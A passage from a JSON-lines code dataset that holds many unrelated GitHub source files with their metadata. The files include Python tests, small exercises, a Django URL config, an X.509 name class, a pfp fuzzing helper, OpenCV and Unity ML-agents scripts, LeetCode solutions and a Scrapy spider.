ref_docstring = \"\"\"\n incomplete_doc_sub(self, radius)\n\n\n Defined at main.f90 lines 38-41\n\n Parameters\n ----------\n circle : T_Circle\n radius : float, [in] radius of the circle\n\n Brief: Incomplete doc\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_param_return(self):\n circle = m_circle.t_circle()\n docstring = m_circle.output_1.__doc__\n ref_docstring = \"\"\"\n output = output_1()\n\n\n Defined at main.f90 lines 59-61\n\n\n Returns\n -------\n output : float, [out] this is 1\n\n Brief: subroutine output_1 outputs 1\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_function_return(self):\n circle = m_circle.t_circle()\n docstring = m_circle.function_2.__doc__\n ref_docstring = \"\"\"\n function_2 = function_2(input)\n\n\n Defined at main.f90 lines 69-71\n\n Parameters\n ----------\n input : str, [in] value\n\n Returns\n -------\n function_2 : int, return value\n\n Brief: this is a function\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_details(self):\n circle = m_circle.t_circle()\n docstring = m_circle.details_doc.__doc__\n ref_docstring = \"\"\"\n details_doc(self, radius)\n\n\n Defined at main.f90 lines 80-82\n\n Parameters\n ----------\n circle : T_Circle, [in,out] t_circle to initialize\n radius : float, [in] radius of the circle\n\n Brief: Initialize circle\n Details: Those are very informative details\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n @unittest.skip(\"Support for this feature is not planned for now\")\n def test_doc_inside(self):\n circle = m_circle.t_circle()\n docstring = m_circle.doc_inside.__doc__\n ref_docstring = \"\"\"\n doc_inside(self, radius)\n\n\n Defined at main.f90 lines 43-52\n\n Parameters\n ----------\n circle : T_Circle, [in,out] t_circle to initialize\n radius : float, [in] radius of the circle\n\n Brief: Doc inside\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n\nif __name__ == '__main__':\n\n unittest.main()\n","repo_name":"jameskermode/f90wrap","sub_path":"examples/docstring/docstring_test.py","file_name":"docstring_test.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"72"} +{"seq_id":"7525683188","text":"#Python3\np=input(\"Enter plain text: \")\nkey=int(input(\"Enter key: \"))#for taking integer input\nc=''\nfor i in range(len(p)):\n\ttemp=(ord(p[i])+97+key)%(97+26)\n\tif(temp>97):\n\t\tc=c+chr(temp)\n\telse:\n\t\tc=c=c+chr(temp+26)\nprint(c)\n","repo_name":"jaspreetkaur96/-Network-Security","sub_path":"shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70113105512","text":"from credit_card import CreditCard, GoldenCreditCard, CorporateCreditCard\r\nfrom bank_info import BankInfo\r\nfrom bank_customer import BankCustomer, IndividualCustomer, CorporateCustomer, VIPCustomer, PersonalInfo\r\n\r\n\r\ndef main():\r\n # Create instances with decorators\r\n golden_credit_card = GoldenCreditCard(CreditCard)(\"John Doe\", \"1234567890123456\", 10000.0, 45, \"123\")\r\n corporate_credit_card = CorporateCreditCard(CreditCard)(\"Jane Doe\", \"9876543210987654\", 20000.0, 60, \"456\")\r\n\r\n individual_customer = IndividualCustomer(BankCustomer)(PersonalInfo(\"Alice Smith\", 28, \"456 Main St\"),\r\n BankInfo(\"Example Bank\", \"Alice Smith\", [\"1111222233334444\"],\r\n {\"1111222233334444\": [\"2022-01-01: +$500\",\r\n \"2022-02-01: -$200\"]}))\r\n\r\n corporate_customer = CorporateCustomer(BankCustomer)(PersonalInfo(\"Bob Johnson\", 35, \"789 Business St\"),\r\n BankInfo(\"Example Bank\", \"Bob Johnson\", [\"5555666677778888\"], {\r\n \"5555666677778888\": [\"2022-01-01: +$1000\",\r\n \"2022-02-01: -$300\"]}))\r\n\r\n vip_customer = VIPCustomer(BankCustomer)(PersonalInfo(\"Eve Williams\", 40, \"123 VIP Lane\"),\r\n BankInfo(\"Example Bank\", \"Eve Williams\", [\"9999888877776666\"], {\r\n \"9999888877776666\": [\"2022-01-01: +$2000\", \"2022-02-01: -$500\"]}))\r\n\r\n # Test the decorated objects\r\n print(\"Golden Credit Card Details:\")\r\n print(golden_credit_card.give_details())\r\n\r\n print(\"\\nCorporate Credit Card Details:\")\r\n print(corporate_credit_card.give_details())\r\n\r\n print(\"\\nIndividual Customer Details:\")\r\n print(individual_customer.give_details())\r\n\r\n print(\"\\nCorporate Customer Details:\")\r\n print(corporate_customer.give_details())\r\n\r\n print(\"\\nVIP Customer Details:\")\r\n print(vip_customer.give_details())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"TwoUfo/Patern_FEP21","sub_path":"Тисовський Олег/Patern-Lab-5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70471236392","text":"from django.conf.urls import url\n\nfrom user import views\n\nurlpatterns = [\n url(r'^register/', views.register, name='register'),\n url(r'^login/', views.login, name='login'),\n url(r'^logout/', views.logout, name='logout'),\n # url(r'^userper/', views.userper, name='userper')\n #自行实现验证\n # url(r'^my_login/', views.my_login, name='my_login'),\n # url(r'^my_register/', views.my_register, name='my_register'),\n # url(r'^my_logout/', views.my_logout, name='my_logout'),\n ]","repo_name":"ZhouForrest/djangoProjects","sub_path":"day01/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14727324108","text":"# https://www.acmicpc.net/problem/10828\n\nimport sys\nanswer = []\n\nn = int(sys.stdin.readline())\n\nfor i in range(0,n):\n word = str(sys.stdin.readline().strip())\n if word == \"pop\":\n if not answer:\n print(-1) # 비어있음\n else:\n print(answer.pop())\n elif word == \"size\":\n print(len(answer))\n elif word == \"empty\":\n if not answer:\n print(1) # 비어있음\n else:\n print(0)\n elif word == \"top\":\n if not answer:\n print(-1) # 비어있음\n else :\n print(answer[-1])\n elif word.startswith('push'):\n _, item = word.split()\n answer.append(int(item))\n else:\n pass\n\n\n\n# 간편한 풀이\nimport sys\ninput=sys.stdin.readline\n\ns = []\nn = int(input().rstrip())\n\nfor _ in range(n):\n op = list(map(str, input().split()))\n if op[0] == 'push':\n s.append(int(op[1]))\n elif op[0] == 'pop':\n print(s[-1] if len(s) else -1)\n s = s[:-1]\n elif op[0] == 'size':\n print(len(s))\n elif op[0] == 'empty':\n print(0 if len(s) else 1)\n elif op[0] == 'top':\n print(s[-1] if len(s) else -1)\n","repo_name":"sunnyineverywhere/algorithm","sub_path":"yhjune/Data Structre (자료구조)/B10828.py","file_name":"B10828.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22055037433","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis module contains the base classes used\nwhen defining mutation strategies for pfp\n\"\"\"\n\n\nimport glob\nimport os\nimport six\n\n\nget_strategy = None\nStratGroup = None\nFieldStrat = None\n\n\ndef init():\n global get_strategy\n global StratGroup\n global FieldStrat\n import pfp.fuzz.strats\n\n get_strategy = pfp.fuzz.strats.get_strategy\n StratGroup = pfp.fuzz.strats.StratGroup\n FieldStrat = pfp.fuzz.strats.FieldStrat\n\n # load all of the built-in strategies\n for strat_file in glob.glob(os.path.join(os.path.dirname(__file__), \"*.py\")):\n filename = os.path.basename(strat_file)\n if filename in [\"__init__.py\", \"base.py\"]:\n continue\n mod_name = filename.replace(\".py\", \"\").replace(\".pyc\", \"\")\n __import__(\"pfp.fuzz.\" + mod_name)\n\n\ndef mutate(field, strat_name_or_cls, num=100, at_once=1, yield_changed=False):\n \"\"\"Mutate the provided field (probably a Dom or struct instance) using the\n strategy specified with ``strat_name_or_class``, yielding ``num`` mutations\n that affect up to ``at_once`` fields at once.\n\n This function will yield back the field after each mutation, optionally\n also yielding a ``set`` of fields that were mutated in that iteration (if ``yield_changed`` is\n ``True``). It should also be noted that the yielded set of changed fields *can*\n be modified and is no longer needed by the mutate() function.\n\n :param pfp.fields.Field field: The field to mutate (can be anything, not just Dom/Structs)\n :param strat_name_or_class: Can be the name of a strategy, or the actual strategy class (not an instance)\n :param int num: The number of mutations to yield\n :param int at_once: The number of fields to mutate at once\n :param bool yield_changed: Yield a list of fields changed along with the mutated dom\n :returns: generator\n \"\"\"\n import pfp.fuzz.rand as rand\n\n init()\n\n strat = get_strategy(strat_name_or_cls)\n to_mutate = strat.which(field)\n\n with_strats = []\n for to_mutate_field in to_mutate:\n field_strat = strat.get_field_strat(to_mutate_field)\n if field_strat is not None:\n with_strats.append((to_mutate_field, field_strat))\n\n # we don't need these ones anymore\n del to_mutate\n\n # save the current value of all subfields without\n # triggering events\n field._pfp__snapshot(recurse=True)\n\n count = 0\n for x in six.moves.range(num):\n\n chosen_fields = set()\n idx_pool = set([x for x in six.moves.xrange(len(with_strats))])\n\n # modify `at_once` number of fields OR len(with_strats) number of fields,\n # whichever is lower\n for at_onces in six.moves.xrange(min(len(with_strats), at_once)):\n # we'll never pull the same idx from idx_pool more than once\n # since we're removing the idx after choosing it\n rand_idx = rand.sample(idx_pool, 1)[0]\n idx_pool.remove(rand_idx)\n\n rand_field,field_strat = with_strats[rand_idx]\n chosen_fields.add(rand_field)\n\n field_strat.mutate(rand_field)\n \n if yield_changed:\n yield field, chosen_fields\n else:\n # yield back the original field\n yield field\n\n # restore the saved value of all subfields without\n # triggering events\n field._pfp__restore_snapshot(recurse=True)\n","repo_name":"Leonardo-DiCaprio/fileFuzz","sub_path":"cmp/utils/pfp/fuzz/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"6223900729","text":"from collections import defaultdict\nfrom typing import List\n\nfrom cryptography import x509\nfrom cryptography.hazmat._oid import NameOID\n\n\nfrom pydantic import Field, ConfigDict\n\nfrom pki_tools.types.crypto_parser import CryptoParser\n\n\nclass Name(CryptoParser):\n \"\"\"\n Name type describes certificate subject or issuer.\n The attributes are following the\n [RFC5280#Section-4.1.2.4](https://datatracker.ietf.org/doc/html/rfc5280#section-4.1.2.4)\n\n Note that every attribute is a list of string in order to support\n multivalued RDNs.\n\n Attributes:\n c -- Country Name (2.5.4.6)\n o -- Organization Name (2.5.4.10)\n ou -- Organizational Unit Name (2.5.4.11)\n dnq -- Distinguished Name Qualifier (2.5.4.46)\n s -- State Or Province Name (2.5.4.8)\n cn -- Common Name (2.5.4.3)\n serial -- Serial Number (2.5.4.5)\n ln -- Locality Name (2.5.4.7)\n t -- Title (2.5.4.12)\n sn -- Surname (2.5.4.4)\n gn -- Given Name (2.5.4.42)\n i -- Initials (2.5.4.43)\n p -- Pseudonym (2.5.4.65)\n gq -- Generation Qualifier (2.5.4.44)\n dc -- Domain Component (0.9.2342.19200300.100.1.25)\n \"\"\"\n\n model_config = ConfigDict(populate_by_name=True)\n\n c: List[str] = Field(alias=NameOID.COUNTRY_NAME.dotted_string, default=[])\n o: List[str] = Field(\n alias=NameOID.ORGANIZATION_NAME.dotted_string, default=[]\n )\n ou: List[str] = Field(\n alias=NameOID.ORGANIZATIONAL_UNIT_NAME.dotted_string, default=[]\n )\n dnq: List[str] = Field(\n alias=NameOID.DN_QUALIFIER.dotted_string, default=[]\n )\n s: List[str] = Field(\n alias=NameOID.STATE_OR_PROVINCE_NAME.dotted_string, default=[]\n )\n cn: List[str] = Field(alias=NameOID.COMMON_NAME.dotted_string, default=[])\n serial: List[str] = Field(\n alias=NameOID.SERIAL_NUMBER.dotted_string, default=[]\n )\n\n ln: List[str] = Field(\n alias=NameOID.LOCALITY_NAME.dotted_string, default=[]\n )\n t: List[str] = Field(alias=NameOID.TITLE.dotted_string, default=[])\n sn: List[str] = Field(alias=NameOID.SURNAME.dotted_string, default=[])\n gn: List[str] = Field(alias=NameOID.GIVEN_NAME.dotted_string, default=[])\n i: List[str] = Field(alias=NameOID.INITIALS.dotted_string, default=[])\n p: List[str] = Field(alias=NameOID.PSEUDONYM.dotted_string, default=[])\n gq: List[str] = Field(\n alias=NameOID.GENERATION_QUALIFIER.dotted_string, default=[]\n )\n dc: List[str] = Field(\n alias=NameOID.DOMAIN_COMPONENT.dotted_string, default=[]\n )\n\n @classmethod\n def from_cryptography(cls, name: x509.Name):\n subject = defaultdict(set)\n for attribute in name:\n for att in name.get_attributes_for_oid(attribute.oid):\n subject[att.oid.dotted_string].add(att.value)\n return cls(**subject)\n\n def to_crypto_name(self) -> x509.Name:\n name_list = []\n for attr_name in vars(self):\n vals = getattr(self, attr_name)\n if not vals:\n continue\n\n oid = Name.model_fields[attr_name].alias\n for val in vals:\n name_list.append(\n x509.NameAttribute(x509.ObjectIdentifier(oid), val)\n )\n\n return x509.Name(name_list)\n\n def _string_dict(self):\n ret = {}\n for a in self.model_dump():\n for val in getattr(self, a):\n ret[a.upper()] = val\n return ret\n\n def __str__(self):\n name_list = []\n for k, v in self._string_dict().items():\n name_list.append(f\"{k}: {v}\")\n return \", \".join(name_list)\n","repo_name":"fulder/pki-tools","sub_path":"pki_tools/types/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70183115112","text":"\"\"\"\n@file hough_lines.py\n@brief This program demonstrates line finding with the Hough transform\n\"\"\"\nimport sys\nimport math\nimport cv2 as cv\nimport numpy as np\n\n\ndef main(argv):\n ## [load]\n default_file = 'sudoku.png'\n filename = argv[0] if len(argv) > 0 else default_file\n\n # Loads an image\n src = cv.imread(cv.samples.findFile(filename), cv.IMREAD_GRAYSCALE)\n\n # Check if image is loaded fine\n if src is None:\n print ('Error opening image!')\n print ('Usage: hough_lines.py [image_name -- default ' + default_file + '] \\n')\n return -1\n ## [load]\n\n ## [edge_detection]\n # Edge detection\n dst = cv.Canny(src, 50, 200, None, 3)\n ## [edge_detection]\n\n # Copy edges to the images that will display the results in BGR\n cdst = cv.cvtColor(dst, cv.COLOR_GRAY2BGR)\n cdstP = np.copy(cdst)\n\n ## [hough_lines]\n # Standard Hough Line Transform\n lines = cv.HoughLines(dst, 1, np.pi / 180, 150, None, 0, 0)\n ## [hough_lines]\n ## [draw_lines]\n # Draw the lines\n if lines is not None:\n for i in range(0, len(lines)):\n rho = lines[i][0][0]\n theta = lines[i][0][1]\n a = math.cos(theta)\n b = math.sin(theta)\n x0 = a * rho\n y0 = b * rho\n pt1 = (int(x0 + 1000*(-b)), int(y0 + 1000*(a)))\n pt2 = (int(x0 - 1000*(-b)), int(y0 - 1000*(a)))\n\n cv.line(cdst, pt1, pt2, (0,0,255), 3, cv.LINE_AA)\n ## [draw_lines]\n\n ## [hough_lines_p]\n # Probabilistic Line Transform\n linesP = cv.HoughLinesP(dst, 1, np.pi / 180, 50, None, 50, 10)\n ## [hough_lines_p]\n ## [draw_lines_p]\n # Draw the lines\n if linesP is not None:\n for i in range(0, len(linesP)):\n l = linesP[i][0]\n cv.line(cdstP, (l[0], l[1]), (l[2], l[3]), (0,0,255), 3, cv.LINE_AA)\n ## [draw_lines_p]\n ## [imshow]\n # Show results\n cv.imshow(\"Source\", src)\n cv.imshow(\"Detected Lines (in red) - Standard Hough Line Transform\", cdst)\n cv.imshow(\"Detected Lines (in red) - Probabilistic Line Transform\", cdstP)\n ## [imshow]\n ## [exit]\n # Wait and Exit\n cv.waitKey()\n return 0\n ## [exit]\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"joachimBurket/esp32-opencv","sub_path":"samples/python/tutorial_code/ImgTrans/HoughLine/hough_lines.py","file_name":"hough_lines.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"72"} +{"seq_id":"21712164747","text":"from matplotlib import pyplot as plt\ndef DDA(x0,y0,x1,y1):\n dx=abs(x1-x0)\n dy=abs(y1-y0)\n m=dy/dx\n steps=max(dx,dy)\n xlist=[]\n ylist=[]\n print(steps)\n for i in range(steps):\n if m<1:\n x0=x0+1\n y0=y0+m\n elif m==1:\n x0=x0+1\n y0=y0+1\n elif m>1:\n x0=x0+1/m\n y0=y0+1\n\n x0=round(x0,2)\n y0=round(y0,2)\n print(\"x=\",x0, end=\", \")\n print(\"y=\",y0, end=\"\\n\")\n\n xlist.append(x0)\n ylist.append(y0)\n plt.plot(xlist,ylist,linestyle=\"--\",marker=\"+\")\n plt.show()\n\n#main()\nprint(\"Insert Starting Coordinate\")\nx0=int(input())\ny0=int(input())\nprint(\"Insert n Coordinate\")\nx1=int(input())\ny1=int(input())\nDDA(x0,y0,x1,y1)\n","repo_name":"rakib-utsho/Computer-Graphics","sub_path":"myAlexa/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6327102576","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport numpy as np\nimport sys\n\n\n# In[ ]:\n\ncombos = {(\"rock\", \"paper\"): \"You Win!\",\n (\"rock\", \"scissors\"): \"You Lost!\",\n (\"paper\", \"rock\"): \"You Lost!\",\n (\"paper\", \"scissors\"): \"You Won!\",\n (\"scissors\", \"rock\"): \"You Won!\",\n (\"scissors\", \"paper\"): \"You Lost!\"}\n\noptions = [\"rock\",\"paper\",\"scissors\"]\n\ndef play(your_choice, combos, options):\n\n your_choice = your_choice.lower()\n comp_choice = options[np.random.randint(0,3)]\n print(f\"The computer chose: {comp_choice}\")\n\n if your_choice == comp_choice:\n print(\"It's A Tie!\")\n else:\n print(combos[(comp_choice,your_choice)])\n\n\n# In[ ]:\n\n\nprint(\"Rock, Paper, Scissors... \\n\")\n\nwhile True:\n player_choice = input(\"Input your choice: \")\n play(player_choice,combos,options)\n print(\" \")\n quit = input(\"Play again? y/n: \").lower()\n if quit == \"n\":\n sys.exit()\n print(\"\")\n","repo_name":"mont-grunthal/Teaching_game","sub_path":"rock_dict.py","file_name":"rock_dict.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9001941556","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 5 14:12:18 2020\n\n@author: ramyagurunathan\n\nRead-Shockley Energy versus the Thermal Boundary Resistance\n\"\"\"\nfrom ArrayScattering import ArrayScattering as AS\nimport numpy as np\nfrom math import pi as pi\nimport matplotlib.pyplot as plt\nimport ThermalTransport as TT\n\n'''\nMaterials Parameters\n'''\ninput_dict = {'avg_vs': 6084,\n 'atmV': [2E-29],\n 'N': 2,\n 'bulkmod' : 97.83E9,\n 'nu' : 0.29,\n 'gruneisen' : 1,\n }\n\ntwist = AS(**input_dict, geom = 'twist', theta = 5, ax = {'n': 1, 'm' : 2}, d_GS = 350E-9, bvK = True)\n\ndef core_energy(Ec, b, theta):\n theta = theta * (pi / 180)\n return 2 * np.sin(2 * theta) * (Ec / b)\n\ndef strain_energy(Es, b, theta):\n theta = theta * (pi / 180)\n return (Es / b) * np.log(np.sin(2 * theta))\n\n\ncore = []\nstrain = []\ntot = []\n\nEc = 1\nEs = 1\nfor t in [1, 2, 3, 5, 7, 8, 9, 10, 15]:\n c = core_energy(Ec, twist.b, t)\n s = strain_energy(Es, twist.b, t)\n core.append(c)\n strain.append(s)\n tot.append(c + s)\n\n\ntwist1 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist1spectral_updatetau.npy')\ntwist2 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist2spectral_updatetau.npy')\ntwist3 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist3spectral_updatetau.npy')\ntwist5 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist5spectral_updatetau.npy')\ntwist7 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist7spectral_updatetau.npy')\ntwist8 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist8spectral_updatetau.npy')\ntwist10 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist10spectral_updatetau.npy')\ntwist15 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist15spectral_updatetau.npy')\n\ntbc1 = []\ntbc2 = []\ntbc3 = []\ntbc5 = []\ntbc7 = []\ntbc8 = []\ntbc10 = []\ntbc15 = []\nfor T in [100, 150,200,250,300, 500]:\n transport1 = TT.transport_coeffs_from_tau(twist, twist1[0] / twist.vs, twist1[1], T)\n transport2 = TT.transport_coeffs_from_tau(twist, twist2[0] / twist.vs, twist2[1], T)\n transport3 = TT.transport_coeffs_from_tau(twist, twist3[0] / twist.vs, twist3[1], T)\n transport5 = TT.transport_coeffs_from_tau(twist, twist5[0] / twist.vs, twist5[1], T)\n transport7 = TT.transport_coeffs_from_tau(twist, twist7[0] / twist.vs, twist7[1], T)\n transport8 = TT.transport_coeffs_from_tau(twist, twist8[0] / twist.vs, twist8[1], T)\n transport10 = TT.transport_coeffs_from_tau(twist, twist10[0] / twist.vs, twist10[1], T)\n transport15 = TT.transport_coeffs_from_tau(twist, twist15[0] / twist.vs, twist15[1], T)\n tbc1.append((1 / transport1['TBC']) * 1E9)\n tbc2.append((1 / transport2['TBC']) * 1E9)\n tbc3.append((1 / transport3['TBC']) * 1E9)\n tbc5.append((1 / transport5['TBC']) * 1E9)\n tbc7.append((1 / transport7['TBC']) * 1E9)\n tbc8.append((1 / transport8['TBC']) * 1E9)\n tbc10.append((1 / transport10['TBC']) * 1E9)\n tbc15.append((1 / transport15['TBC']) * 1E9)\n \n'''\nPlot \n'''\n\nfig, ax = plt.subplots()\nax2 = ax.twinx()\n\n\n","repo_name":"RamyaGuru/BoundaryScattering","sub_path":"test_scripts/RSenergy_tbr.py","file_name":"RSenergy_tbr.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12687416403","text":"from mlagents_envs.environment import UnityEnvironment, DecisionSteps\nimport numpy as np\nfrom ppo import ppo\nimport sys\n\nclass UnityEnvWrapper:\n def __init__(self, filename=None):\n self.env = UnityEnvironment(file_name=filename, seed=1, worker_id=0, side_channels=[])\n self.env.reset()\n self.behavior_names = [b for b in self.env.behavior_specs]\n self.behavior_specs = [self.env.behavior_specs[b] for b in self.behavior_names]\n self.behavior_name = self.behavior_names[0]\n self.behavior_spec = self.behavior_specs[0]\n self.action_shape = (self.behavior_spec.action_shape,)\n self.state_shape = [s[0] for s in self.behavior_spec.observation_shapes]\n rays = 101\n steps = 5\n self.state_shape[0] -= rays*(steps-1)\n self.state_shape = (sum(self.state_shape),)\n\n def step(self,actions=None):\n if(actions is not None):\n self.env.set_actions(self.behavior_name, actions)\n self.env.step()\n\n ds,ts = self.env.get_steps(self.behavior_name)\n actors = {}\n\n print(\"DS:\")\n print(ds.agent_id)\n print(ds.reward)\n\n print(\"TS:\")\n print(ts.agent_id)\n print(ts.reward)\n rays = 101\n steps = 5\n for i,ID in enumerate(ds.agent_id):\n raycast = ds.obs[0][i][rays*(steps-1):]\n positions = ds.obs[1][i]\n state = np.concatenate((raycast,positions)).flatten()\n actors[ID] = {'obs':state,'reward':ds.reward[i],'done':False}\n\n for i,ID in enumerate(ts.agent_id):\n raycast = ts.obs[0][i][rays*(steps-1):]\n positions = ts.obs[1][i]\n state = np.concatenate((raycast,positions)).flatten()\n actors[ID] = {'obs':state,'reward':ts.reward[i],'done':True}\n\n return actors\n\n def reset(self):\n self.env.reset()\n\nif __name__ == \"__main__\":\n resume = False\n if 'resume' in sys.argv:\n resume = True\n env_fn = lambda : UnityEnvWrapper(filename=\"./20robots/Fruit Picker.exe\")\n ppo(env_fn, path='./models/', resume=resume)\n","repo_name":"shervlad/unity_training","sub_path":"run_unity_ppo.py","file_name":"run_unity_ppo.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41236690555","text":"# cothread.py\n#\n# Un objeto de hilo que ejecuta una corrutina dentro de él. Se envían mensajes\n# a través de un objeto Queue\n\nfrom threading import Thread\nfrom queue import Queue\nimport threading\nfrom coroutine import *\n\n@coroutine\ndef threaded(target):\n messages = Queue() \n def run_target(): \n while True: \n item = messages.get()\n if item is GeneratorExit:\n target.close()\n return \n else: \n target.send(item)\n Thread(target=run_target).start()\n try:\n while True:\n item = (yield) \n messages.put(item)\n except GeneratorExit:\n messages.put(GeneratorExit)\n\n# Ejemplo de Uso\n\nif __name__ == '__main__':\n import xml.sax\n from cosax import EventHandler\n from buses import * \n mi_manejador = EventHandler(buses_to_dicts(threaded(filter_on_field(\"route\",\"22\",\n filter_on_field(\"direction\",\"North Bound\",\n bus_locations()))))) \n xml.sax.parse(\"allroutes.xml\",mi_manejador )\n \n","repo_name":"arbarr20/python-notes","sub_path":"generadores parte 2/cothread.py","file_name":"cothread.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25791872634","text":"# word Break 2\n# leetcode 140\n\n\nclass Solution1(object):\n\tdef wordBreak(self, s, wordDict):\n\t\t\"\"\"\n\t\t:type s: str\n\t\t:type wordDict: List[str]\n\t\t:rtype: List[str]\n\t\t\"\"\"\n\t\t# bcaktrack\n\t\t# Time: O(n ^ n)\n\t\t# space: O(n * n * n)\n\n\t\tdef backtrack(s, wordDict, start):\n\t\t\tres = []\n\t\t\t\n\t\t\tif start == len(s):\n\t\t\t\tres.append(\"\")\n\t\t\t\treturn res\n\t\t\t\n\t\t\tfor i in range(start, len(s)):\n\t\t\t\tif s[start: i + 1] in wordDict:\n\t\t\t\t\tlists = backtrack(s, wordDict, i + 1)\n\t\t\t\t\tfor l in lists:\n\t\t\t\t\t\tres.append(s[start: i + 1] + (\"\" if l == \"\" else \" \") + l)\n\t\t\treturn res\n\t\t\t\t\t\t\n\t\treturn backtrack(s, set(wordDict), 0)\n\n\n\nclass Solution2(object):\n\tdef wordBreak(self, s, wordDict):\n\t\t\"\"\"\n\t\t:type s: str\n\t\t:type wordDict: List[str]\n\t\t:rty\n\t\t\"\"\"\n\t\t# backtrack with memo\n\t\t# Time: O(n ^ 3)\n\t\t# space: O(n ^ 3)\n\t\t\n\t\tdef backtrack_memo(s, wordDict, start, memo):\n\t\t\tif start in memo:\n\t\t\t\treturn memo[start]\n\t\t\tres = []\n\t\t\tif start == len(s):\n\t\t\t\tres.append(\"\")\n\t\t\t\treturn res\n\t\t\tfor i in range(start, len(s)):\n\t\t\t\tif s[start: i + 1] in wordDict:\n\t\t\t\t\tlists = backtrack_memo(s, wordDict, i + 1, memo)\n\t\t\t\t\tfor l in lists:\n\t\t\t\t\t\tres.append(s[start: i + 1] + (\"\" if l == \"\" else \" \") + l)\n\t\t\tmemo[start] = res\n\t\t\treturn res\n\t\t\n\t\treturn backtrack_memo(s, set(wordDict), 0, {})\n\n\n\nclass Solution3(object):\n\tdef wordBreak(self, s, wordDict):\n\t\t\"\"\"\n\t\t:type s: str\n\t\t:type wordDict: List[str]\n\t\t:rtype: List[str]\n\t\t\"\"\"\t\t\n\t\t# DP\n\t\t# Time: O(n ^ 3)\n\t\t# Space: O(n ^ 3)\n\t\t# MLE\n\n\t\tdp = {i:[] for i in range(len(s) + 1)}\n\t\tdp[0].append(\"\")\n\t\twordDictSet = set(wordDict)\n\t\t\n\t\tfor i in range(1, len(s) + 1):\n\t\t\tlists = []\n\t\t\tfor j in range(i):\n\t\t\t\tif len(dp[j]) > 0 and s[j: i] in wordDictSet:\n\t\t\t\t\tfor l in dp[j]:\n\t\t\t\t\t\tlists.append(l + (\"\" if l == \"\" else \" \") + s[j: i])\n\t\t\tdp[i] = lists\n\t\treturn dp[len(s)]\n\n\t\t\n\n ","repo_name":"yananfei-Bette/Leetcode","sub_path":"interview/EA/word_Break_2.py","file_name":"word_Break_2.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31967391625","text":"# !/usr/python/bin\n# -*- coding: UTF-8 -*-\nimport scrapy\n\nclass HeartsongSpider(scrapy.spiders.Spider):\n name = \"heartsong\" # 爬虫的名字,执行时使用\n allowed_domains = [\"heartsong.top\"] # 允许爬取的域名,非此域名的网页不会爬取\n start_urls = [\n \"http://www.heartsong.top\" # 起始url,此例只爬这一个页面\n ]\n\n def parse(self, response): # 真正的爬虫方法\n html = response.body # response是获取到的来自网站的返回\n # 以下四行将html存入文件\n filename = \"index.html\"\n file = open(filename, \"w\")\n file.write(html)\n file.close()","repo_name":"yucongshen/spiderProject","sub_path":"tutorial/tutorial/spiders/heartsong_spider.py","file_name":"heartsong_spider.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43664305088","text":"# Import libraries\r\nfrom keras.layers import Dense, MaxPooling2D, Conv2D, Dropout, LeakyReLU, 